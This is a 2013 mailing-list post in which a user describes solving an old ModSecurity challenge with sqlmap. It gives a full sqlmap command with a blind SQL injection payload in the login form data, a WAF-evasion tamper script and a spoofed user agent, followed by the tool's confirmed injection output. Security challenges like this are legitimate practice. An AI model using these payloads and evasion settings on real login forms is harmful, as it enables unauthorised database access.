[sqlmap-users] Old modsecurity challange
Brought to you by:
inquisb
From: Marcell F. <fod...@gm...> - 2013-05-31 08:34:38
|
Heya, I had some time to play arround with and old medsecurity challange here: http://www.modsecurity.org/zero.webappsecurity.com/ I did make this work under sqlmap: python ./sqlmap.py -u " http://www.modsecurity.org/zero.webappsecurity.com/login1.asp" --data "login=asd'and(1)like(DateValue(iif(1=1*,'1/1/2013','2013')))and'1'like'1&password=asd&graphicOption=minimum" --string "Object moved" --technique "b" --dbms "msaccess" --tamper "space2randomblank" --user-agent "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0" I had to remove %0C from space2randomblank to make this work. Response: Place: (custom) POST Parameter: #1* Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: login=asd'and(1)like(DateValue(iif(1=1 AND 5276=5276,'1/1/2013','2013')))and'1'like'1&password=asd&graphicOption=minimum -- Is the challange way outdated or something I do wrong? M |